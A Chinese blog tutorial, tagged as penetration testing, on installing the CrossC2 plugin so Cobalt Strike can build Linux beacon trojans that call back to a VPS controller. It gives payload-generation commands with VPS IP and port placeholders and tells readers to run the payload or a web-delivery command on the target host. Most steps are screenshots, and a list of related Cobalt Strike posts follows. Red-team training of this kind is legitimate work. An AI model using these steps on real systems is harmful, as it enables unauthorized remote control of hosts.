【渗透测试】Cobalt Strike 插件 CrossC2(v3.0.2) 安装使用

已于 2022-02-16 10:44:35 修改
阅读量1.5w 收藏 27
点赞数 6
分类专栏: 渗透测试 内网 文章标签: linux 网络安全 服务器
于 2022-02-09 16:09:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42742658/article/details/122844041
版权

目录

一、起因

cobaltstike默认只生成windows载荷,不能上线linux主机,想上线linux主机需要通过ssh回话的方式,CrossC2可以通过生成linux载荷直接上线linux主机(或Mac)
项目地址:https://github.com/gloxec/CrossC2/
参考地址:https://gloxec.github.io/CrossC2/zh_cn/

二、安装

需要准备
vps上的cs的key文件:.cobaltstrike.beacon_keys(该文件隐藏)
CrossC2的配置文件:CrossC2-GithubBot-2021-11-02.cna
以及二进制文件:genCrossC2.MacOS和genCrossC2.Linux等
cs4.0测试

1)客户端配置

下载项目地址,或者直接下载对应的genCrossC2.版本和cna文件,我这里没有下载整个项目文件,而是创建一个crossc2目录,里面下载了如下几个文件:
在这里插入图片描述
在这里插入图片描述

编辑cna配置文件,修改两个全局变量的参数CC2_PATH和CC2_BIN,这里要上线linux主机,所以CC2_BIN选择genCrossC2.Linux,CC2_PATH是插件所在的绝对路径

在这里插入图片描述

从vps上拷贝下来key文件,我这里直接放在crossc2目录里面一起了,key文件是对应cs版本目录底下的隐藏文件,复制的时候注意一下即可

2)vps服务端操作

正常打开cs,teamserver等等等

3)客户端cs操作

cs左上角Cobalt Strike–>Script manager脚本管理,然后load加载cna文件即可安装到cs上
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

三、上线
1)二进制木马文件上线

创建https监听之后使用crossc2插件,由于我使用的crossc2是v3.0.2新版本,所以和网上的教程有些不同(不影响使用)
在这里插入图片描述
在这里插入图片描述

设置好对应的选项然后build即可生成木马t_cc2.out
在目标linux主机上执行即可完成上线

另一种木马制作方式:在命令行使用crossc2直接生成
./genCrossC2.Linux [vps-ip] [vps-ip-port] ./.cobaltstrike.beacon_keys null Linux x64 test2
在这里插入图片描述

./genCrossC2.Linux [vps-ip] [vps-ip-port] null null Linux x64 test3
在这里插入图片描述

不指定秘钥文件生成

实际测试中由于网络原因上线失败,同时该过程不包含免杀

2)命令行上线

CrossC2–>Sripted Web Delivery(s)

在这里插入图片描述
在这里插入图片描述

复制命令在目标机器上执行即可

在这里插入图片描述

久违
2022.2.9

久违 °
关注
  • 6
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
CobaltStike4.2_windows版
01-07
CobaltStike4.2 win版 无解压密码 打开即用 C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透
CobaltStrike4.0渗透测试手册
03-18
Cobalt Strike 4.0渗透测试手册》是一本深度探讨网络安全中渗透测试技术的专业指南,特别是聚焦于Cobalt Strike 4.0这一强大的安全工具。Cobalt Strike是一款广泛使用的红队操作框架,它允许安全专业人员模拟攻击...
Cobalt Strike汉化版——安装使用教程
热门推荐
W小哥
04-12 1万+
安装教程
cs上线linux主机
逍遥小哥的博客
01-19 739
cobaltstike默认只生成windows载荷,不能上线linux主机,CrossC2可以通过生成linux载荷直接上线linux主机(或Mac).由于我们cs客户端是在windows生成木马,就下载win版的crossC2就行。把此文件.cobaltstrike.beacon_keys 文件放到客户端cs的文件夹里。和我上面的命令一样啊,感觉就是配了个路径的环境变量,执行起了更加方便了。这就是生成成功,会在cs客户端目录生成木马文件, 我这里生成了两个。然后把我们刚才用第二个方式生成木马文件丢上去。
2024年网络安全最新Cobalt Strike汉化版——安装使用教程_kali安装cobaltstrike4,网络安全开发真等于废人
最新发布
2401_84302628的博客
05-12 1285
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CS通过CrossC2件上线linux主机
qq_50854662的博客
09-07 234
CS通过CrossC2件上线linux主机
Cobalt Strike CrossC2(小白教程)
m0_63239459的博客
03-10 1777
cobaltstrike件加载crossc2
Cobalt Strike利用CrossC2件上线linux主机
3tefanie丶zhou的博客
03-10 1378
【言者只是说在嘴边,听者却要刻在心里。】
linux cs防火墙,关于CS上线Linux主机(CrossC2)
weixin_42524499的博客
05-12 759
0x01 前言Cross C2是一个支持Linux & MacOS系统的拓展件,支持用户自定义生成的动态库,以无文件落地的方式从内存中加载执行动态库或可执行文件。用法我的想法来说,相当于一个小集群,件化方便利用,实际的渗透中意义并不大,更加实际于命令行渗透,做到无文件落地,过流量检测加密免杀等技术的研究。简而言之:一个CS的简单小件,目的就是上线Linux主机, 可做一些简单的操作,...
CobaltStrike4.0渗透工具cs下载、安装使用教程
qq_39972370的博客
08-10 8610
cobalt strike(简称CS)是一款团队作战渗透测试神器,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端。主要是用来后期持久渗透、横向移动、流量隐藏、数据窃取的工具。当已经在目标机器上执行了CS的payload,它会创建一个Beacon(远控木马功能)回连到C2服务器。
CobaltStrike4.4.zip
09-15
Cobalt Strike是一款备受瞩目的渗透测试工具,主要用于模拟高级威胁行为,帮助网络安全专业人士进行红队操作和评估网络防御的有效性。在这个"CobaltStrike4.4.zip"压缩包中,包含了多个与Cobalt Strike 4.4版本相关...
渗透测试工具-Cobalt Strike
03-21
**Cobalt Strike渗透测试的强大武器** Cobalt Strike(简称CS)是一款广泛应用于网络安全领域的高级渗透测试工具,主要用于模拟攻击者的行为,帮助安全专业人员检测和评估组织的防御能力。这款工具以其强大的功能...
Cobalt Strike 4.5 中英版本一键切换,内置
11-18
使用Cobalt Strike进行内网渗透测试时,必须遵守道德和法律规范,只在授权范围内进行,尊重并保护用户隐私。同时,熟悉并掌握Cobalt Strike的各项功能是提高渗透测试效果的关键。对于新手来说,理解每个组件的作用...
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
Clbalt Strike安装使用详解
m0_52051132的博客
10-19 7194
图标栏功能说明1 添加新的 Cobalt Strik 团队服务器2 删除当前 Cobalt Strik 团队服务器3 新建一个监听器4 切换图形会话按钮5 切换列表会话按钮6 以列表方式显示目标7 密码凭证栏按钮8 下载文件列表9 键盘记录表10 屏幕截图表11 生成Windows下可执行木马12 生成java签名applet攻击13 生成office 宏攻击14 生成powershell后门15 文件托管按钮16 管理web站点17 帮助文档18 关于。
Cobalt Strike(cs)下载及使用
JavaBigData的博客
08-09 3417
【代码】Cobalt Strike(cs)下载及使用
cobalt strike件的使用(超细!)
技术超强的网络安全平台
12-27 1555
cobalt strike件的使用(超细!)前言cobaltstrike作为渗透测试中不可缺少的利器,那么它到底厉害在哪里呢?在默认没有安装扩展的情况下可能功能并不是特别多,多数人会认为我已经基本掌握了cs的使用,但扩展就相当于我们的武器库,武器越多当然打起来也越爽,每次看别人的文章,发现自己的cs不是缺这就是缺那,压根没有办法实践,而且也很少有人会刻意说是哪个件、哪里下载,这就给我们带来了非常大的困扰,索性就搜罗网上的件进行全面加强自己的武器库,感谢大佬们分享的件,以下使用件,将在文末提供。
【内网安全-CS】Cobalt Strike启动运行&上线方法&
12-19 9631
【内网安全-CS】Cobalt Strike启动运行&上线方法&件加载
CobaltStrike 之 Linux上线笔记 (CrossC2使用
box
03-03 1万+
CobaltStrike 默认是不支持Linux 的上线,有一款件解决了一个问题。就是GitHub的一个项目——CrossC2,以下就介绍一下这款件的配置和使用。 一、件配置 项目地址:https://github.com/gloxec/CrossC2 将这两个文件下载下来,创建一个文件夹,并放置文件夹下 修改 CrossC2-GithubBot-2021-11-02.cna 修改**$CC2_PATH**为真实路径,对应本地存放的CrossC2路径。注意最后的 / 修改$CC2_BIN 为pay
Cobalt Strike
08-10
Cobalt Strike件是用于在Cobalt Strike平台上扩展功能的工具。根据引用,在linux上运行Cobalt Strike客户端,需要下载并加载genCrossC2.Linux脚本,而在Windows环境下运行,则需要下载并加载genCrossC2.Win.zip件。这些件可以在CobaltStrike 4.0以上版本中运行,并且可以在实验中成功上线。另外,根据引用和,Cobalt Strike的SSH客户端使用SMB Beacon协议,并实现Beacon命令调用以及子功能的使用。SSH会话可以看作是包含较少命令的Beacon会话,具有自己的唯一ID,与任务和元数据相关联。通过使用-beacons功能,可以获取有关所有Cobalt Strike会话(包括SSH会话和Beacon会话)的信息,并使用-isssh和-isbeacon来检测当前会话的类型。因此,Cobalt Strike件提供了扩展功能和支持SSH会话的能力。123 #### 引用[.reference_title] - *1* [Cobalt Strike CrossC2(小白教程)](https://blog.csdn.net/m0_63239459/article/details/129444567)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [cobalt strike从入门到精通之件开发(二)](https://blog.csdn.net/hyj123480/article/details/115418324)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

久违 °

小菜鸟就要使劲飞

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值